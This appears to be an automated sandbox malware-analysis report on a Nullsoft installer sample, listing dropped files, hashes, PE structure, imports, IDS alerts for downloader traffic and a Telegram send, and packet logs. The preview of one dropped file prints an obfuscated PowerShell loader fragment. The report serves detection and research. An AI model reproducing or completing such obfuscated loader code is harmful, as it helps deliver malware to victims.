SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyvzv1r3.exc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\depersonaliseredes\Ceylonteer.kae

Download File

Process:	C:\Users\user\Desktop\TjoY7n65om.exe
File Type:	data
Category:	dropped
Size (bytes):	489410
Entropy (8bit):	1.2436305558399738
Encrypted:	false
SSDEEP:	1536:cU0VmvQia2T11QAJnUkKziB0gN0lQus3vm1YAzEYu:QVr4Z1QAJnUkKzK0gGlav67u
MD5:	03ADD5EC69F2D821F4BDDF502603364B
SHA1:	CEB941FCEF1D7D81F2BCC650E311A074B72D4DB0
SHA-256:	A8850B76F116EB91305228F5F39B2B6152927531705DE707A60FC74B86DF4003
SHA-512:	4B5864679A31EA4B0268A758B8179E14A1A682059B393834DE0260315BC0D086F1D98E944E0429304FFF518105226C5A9FD991050D98168059C34BCA1A677B2C
Malicious:	false
Preview:	...W............................................................H..p.........;..................C.................................w............................j.......?........ .+................................................................c........b......................7......................H....................".......................................IG+.......................y...................................x...................................L..................+............8...................................................................................o..[......................................1...........................s..............................................4.............8.................E...................................................................T..........................................H..............................W..........................H.....................X................8................................<...........K........................

C:\Users\user\AppData\Local\Temp\depersonaliseredes\Fleece.kar

Download File

Process:	C:\Users\user\Desktop\TjoY7n65om.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 42-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 34359738368.000000
Category:	dropped
Size (bytes):	359870
Entropy (8bit):	1.2579154698125035
Encrypted:	false
SSDEEP:	768:rJW+KJEK8CwPtS6DGm9KLLa+yoa6PQw3HNilLOurKGMTXU9NOXHeFG1jfERxHJ8i:iMCknb2N+S8kEqSe8PW7FZs4baLL
MD5:	8A6A8A75FE9A08909B09C7242C1B0C73
SHA1:	0EC96FBA81824408C7838638BDA73C6C1D055CFA
SHA-256:	1AAD58A3F50A3EF4E50AFCECBAF81D840F4E3F0C512BCC5844A1AEC594A06FF7
SHA-512:	4322DC485F01AD114244945AA63652B191E6BE6C5B4531678310C160AC8963A6FD30E3936747C9282C8EF147806324E99EE954929EB4F1568ADB71E8C89AD596
Malicious:	false
Preview:	....................................................p.................................................................!......................................Tm.......f.............................................X.................B.................j......................................................................t.....................u..........1............+..g....4.B.............................................................................].............Q......m.......................U.....................D..........................Y..y..........................................................t................................................$...............................................................................................................................X..........C....................................h.V...........E...............................................................................t.......................2...c..........................................

C:\Users\user\AppData\Local\Temp\depersonaliseredes\Halvbuernes.sve

Download File

Process:	C:\Users\user\Desktop\TjoY7n65om.exe
File Type:	data
Category:	dropped
Size (bytes):	284538
Entropy (8bit):	7.751827834270769
Encrypted:	false
SSDEEP:	6144:+BfOXo2+1WevY1WQH8xXbBCjfwbec9uVDUGB+xNj0J2xxWPgOek+7di:+BfOXo2+1WszQ+bBCjobZs0Xj0J2XWPv
MD5:	3EC09CE77D7046B1B0A4108EA6AAC00D
SHA1:	85201F8D4EE3DC202574B7EE39AD232503A39EB2
SHA-256:	1E5A50C09CA254DC572C08BC87F596EBF2AE2CCB09EF355BD34A1A7A2B4E1BEF
SHA-512:	BD36A6120C32CCE182A44493AFDAEC571080CAB9668FB80EC84DBB3C55E0B50CF631DBA68617C29CD1AE9B9C61A6947DF157A558E110D0782D73B469AAADE39D
Malicious:	false
Preview:	........SS.......U............JJ.....{{{.....dd.....66..........................................................;;;..\.9999......~~.............99.....................,,.......................]]]]]].........<<<.............22.......yy.........................((((.hh...........z...........g............KK.......\|.........y...>>...A.VVV...............VVV.]]......HH...........OO..........BB............ww...NNNN....................pp.........'.......mmmm................===.ddd.....................[....J...AA......\|........................................X.0000..**....a.=.............1...y...6.....]...}}....@....Q.$$.........:....&&......XX...O..................{{....}.((......>>>............[..........................................>....................................!!.............OO.........rr............T........~........nnnn..............................................<......&&.......'''.............................................................C...!!.....%%%.....................2.

C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209

Download File

Process:	C:\Users\user\Desktop\TjoY7n65om.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4135), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	72197
Entropy (8bit):	5.186143426077576
Encrypted:	false
SSDEEP:	1536:4JZdR4JoVHpJAKH7IGky9kgngX8ijAyIhWNjMlzOi:4JbR4YLbb0z8yIrzOi
MD5:	7616CE045D0E4F80B84CA85F265F7588
SHA1:	F85246DCD0A361746B9FA86A4A78F4424FDECDF8
SHA-256:	3D5C18F1BC08FE7DB0AA8650C0342FF90D588AFD0B71B0091228860677ECC010
SHA-512:	1B6CABF4063EB02503F2FFDECFD5318BE2BDE51E0B0F6B1CAEE7EA09525F4063D6D4231F0015A09985C83DB1729AD627C76F7FDF40807AB30883E4AD24B13A34
Malicious:	true
Preview:	$Tistykpakkes=$skaar;........$Fagblades = @'.Outdrin.Pericra$billedmCfantas,aCousinls AfliritKla.neri Chromal kederi Agib.uaO kestenGangliesT eoremkAphoris=Drm.esy$lavrockk etutteaUnsteadj g dsfoa Hov.dokmicroankOverfeaePt,rodan Uudtmm; Mephit.NitrosifAsses.au Overmon FeriascFlightytNannsloiEksamenoHov dvgnSniffed ForkramMrefluxtaStrygetkLnstigne op endf.oyalisijernba lPieridie StrygnsPatenta Sk gend(Absurdu$SpejderSGlede,eiNonexamdKrebaneeLokalnersagvoldoTamacoamRetningaButche g MashelnFeijoape Esophat StatesiA.ietatcPerorat,Numerat$ Pharm RSdekorniForaarsd AgtersdSporonie Ka,tusr Unl vesforhandl nkraoaU derreg skibsk)Inversf Achates{Peptoly.Vandmll.Prec rr$DriesbjN EffektoH ndelsn Blaserl gralsru SjlegacTirsdagrGaran iaRamletat PjatteiSteatomv LacewoeBasis gl frerhuy Uti.sl Sindalc(RiprapsA Hjrdisl p.edecdLight ieBuddingrBi,sletmGstgi eaUnvoracnBrevhem Sprawl,' ilvirkUKoftenfnIndo.ogdMakro aeS ateswrVeigleatCritica Kemofib$Stoa,eaNenkeltso alpingvKennarteIncurio rad oti Em.loysFo

C:\Users\user\AppData\Local\Temp\depersonaliseredes\montricens.fus

Download File

Process:	C:\Users\user\Desktop\TjoY7n65om.exe
File Type:	data
Category:	dropped
Size (bytes):	409643
Entropy (8bit):	1.258117650984378
Encrypted:	false
SSDEEP:	1536:oK/xjE18JOxBR9iH6C0q2bSbck323mbP5cA:ooEOAxsxw222bRn
MD5:	0B038FD9C23C723696185E52EBCCB874
SHA1:	26F3EE8ABCC584DC46AB1AF5C6B1C26C3914F1A8
SHA-256:	1E6B1012ABE05CD0B6409C6844E61C6314CF9EE5E04AF6E89352E09166C80B13
SHA-512:	8BE9637A6195820DBD8BF6FDB6B35CD0499F007E36FB2B474D9120559473A98EB09CD622821821B16C7DFCE9D98EDDC61D647A61025C4CC36F451C88569E3100
Malicious:	false
Preview:	...tB...........*...............................T..........w....O.............r...#......].....m.......I.....................H..................................................................................}2.Wa..................&......u...............M................c.......................................................................i...................9..."...........y...u......b.....)........................................................................^...........................G.............g..................................................................:.....p........k..................1................:............U...........................................I................................................A.......^..............0....]..........+...............................................l.........k...................................................r....-.............................................................................................................

C:\Users\user\AppData\Local\Temp\depersonaliseredes\udsds.aut

Download File

Process:	C:\Users\user\Desktop\TjoY7n65om.exe
File Type:	data
Category:	dropped
Size (bytes):	499434
Entropy (8bit):	1.2603431949153356
Encrypted:	false
SSDEEP:	1536:fIH5W+q2nuI9Zg1tjaKFi1fc/si9MKqe79+cX2v4Jm:fIHJnZ9+Za/1fwr9FN
MD5:	152C1126D35B77FC957526436ADBEA38
SHA1:	A8B0E26555F1FAAB8ED05EAAF9DDE5DCA113572B
SHA-256:	67780594962B62DD23C55340C9AB1CD11858C15F464E8EE312A690A1759EAFD3
SHA-512:	A8BC5BE5A093095759D3ADB587B58B083DAD6FC9B942161D1A9F0B055E314C69506BAE2409E3D5E195068FB8BAE2C4F1EFFAD6A082276423F9989AF012A5A856
Malicious:	false
Preview:	................................I.....l........................k.......a.......................w....................=...................b.......................{.......+..............................=..................................h............. ......................&.g..........................#.........&..............E.........................................................................................................................................../.........j..{.........<....l......+...........4.........................................................?.................F....................~............~...................u..................P.................'....................................................................j.......................................................O..D............ ..................................V....................................................................8................S.......................................................\..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.695013315037864
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TjoY7n65om.exe
File size:	825'542 bytes
MD5:	6a5b8c6057dff681139fd609ffc6b21d
SHA1:	b37b7a2168980b4772978a640ebf5a02f41697e6
SHA256:	fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41
SHA512:	0be9c3e2e42b53ac22237f9b2a1037ca4bb46ce908df0bdbe455eb1daf41457b6dd85f1d80aee36f47fa3c6d9cf9d3a9e8867928242edf8a93aae21aa703f989
SSDEEP:	12288:wTJidkhIqHdLcMMEbtx0GA72BzYCqqykD0AarMhiNAgZY8i3oXRKQCzcdYSS:wTkQIwL81IBUCqpqrsfZV+ER/c
TLSH:	6F051281BA40B6BEF757863C752681830AF3AD471480BAEB22D0F31F6577163D6077A5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*.....

File Icon


Icon Hash:	07290d2d7979330f

Static PE Info

General

Entrypoint:	0x403359
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F1B [Sat Dec 15 22:24:27 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A20Ch], eax
je 00007F172113D143h
push ebx
call 00007F17211403F5h
cmp eax, ebx
je 00007F172113D139h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F172114036Fh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F172113D11Ch
push 0000000Ah
call 00007F17211403C8h
push 00000008h
call 00007F17211403C1h
push 00000006h
mov dword ptr [0042A204h], eax
call 00007F17211403B5h
cmp eax, ebx
je 00007F172113D141h
push 0000001Eh
call eax
test eax, eax
je 00007F172113D139h
or byte ptr [0042A20Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A2D8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216A8h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0x2cb90	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x62a5	0x6400	5814efda24a547f46f687d77de540309	False	0.6590234375	data	6.431421556070023	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1396	0x1400	ef1be07ca8b096915258569fb3718a3c	False	0.453125	data	5.159710562612049	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20318	0x600	7d0d44c89e64b001096d8f9c60b1ac1b	False	0.4928385416666667	data	3.90464114821524	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x32000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5d000	0x2cb90	0x2cc00	29feacfb95f10d2c97620b954bab0c03	False	0.5635693086592178	data	5.592801421778874	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5d418	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.5097598485744707
RT_ICON	0x6dc40	0xc828	Device independent bitmap graphic, 128 x 256 x 24, image size 51200	English	United States	0.5580210772833724
RT_ICON	0x7a468	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.6542276806802079
RT_ICON	0x7e690	0x3228	Device independent bitmap graphic, 64 x 128 x 24, image size 12800	English	United States	0.585202492211838
RT_ICON	0x818b8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.6878630705394191
RT_ICON	0x83e60	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 7296	English	United States	0.5887404580152672
RT_ICON	0x85b08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7556285178236398
RT_ICON	0x86bb0	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200	English	United States	0.6117283950617284
RT_ICON	0x87858	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.7889344262295082
RT_ICON	0x881e0	0x748	Device independent bitmap graphic, 24 x 48 x 24, image size 1824	English	United States	0.6357296137339056
RT_ICON	0x88928	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8608156028368794
RT_ICON	0x88d90	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832	English	United States	0.658256880733945
RT_DIALOG	0x890f8	0x120	data	English	United States	0.5104166666666666
RT_DIALOG	0x89218	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x89338	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x89400	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x89460	0xae	data	English	United States	0.6206896551724138
RT_VERSION	0x89510	0x340	data	English	United States	0.4951923076923077
RT_MANIFEST	0x89850	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T00:41:13.947470+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.10	49883	142.250.181.238	443	TCP
2025-01-11T00:41:18.936105+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49918	132.226.247.73	80	TCP
2025-01-11T00:41:20.107915+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49918	132.226.247.73	80	TCP
2025-01-11T00:41:20.673469+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49931	104.21.80.1	443	TCP
2025-01-11T00:41:21.404875+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49937	132.226.247.73	80	TCP
2025-01-11T00:41:21.953171+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49943	104.21.80.1	443	TCP
2025-01-11T00:41:23.274530+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49954	104.21.80.1	443	TCP
2025-01-11T00:41:26.003606+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49974	104.21.80.1	443	TCP
2025-01-11T00:41:28.646313+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49984	104.21.80.1	443	TCP
2025-01-11T00:41:30.912977+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.10	49987	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 00:41:12.844785929 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:12.844882965 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:12.845019102 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:12.869796991 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:12.869878054 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:13.501784086 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:13.501918077 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:13.502589941 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:13.502635956 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:13.645745993 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:13.645791054 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:13.646159887 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:13.646234035 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:13.648803949 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:13.695332050 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:13.947458029 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:13.947530031 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:13.947557926 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:13.947604895 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:13.947755098 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:13.947789907 CET	443	49883	142.250.181.238	192.168.2.10
Jan 11, 2025 00:41:13.947835922 CET	49883	443	192.168.2.10	142.250.181.238
Jan 11, 2025 00:41:13.987010002 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:13.987046003 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:13.987107992 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:13.987431049 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:13.987442017 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:14.625344992 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:14.625454903 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:14.629717112 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:14.629733086 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:14.629990101 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:14.630040884 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:14.630366087 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:14.675348043 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.377973080 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.378106117 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.384083986 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.384196997 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.396485090 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.396574020 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.396591902 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.396631002 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.402708054 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.402765989 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.464601040 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.464687109 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.464744091 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.464782953 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.464792013 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.464832067 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.466638088 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.466681004 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.466819048 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.466860056 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.472923994 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.472995043 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.473090887 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.473136902 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.479151011 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.479201078 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.479295015 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.479331017 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.488641977 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.488692045 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.488698959 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.488735914 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.496766090 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.496838093 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.496845961 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.496882915 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.498069048 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.498115063 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.498119116 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.498158932 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.504167080 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.504273891 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.504313946 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.504348993 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.509999037 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.510046005 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.510051966 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.510087967 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.515868902 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.515937090 CET	49890	443	192.168.2.10	142.250.185.65
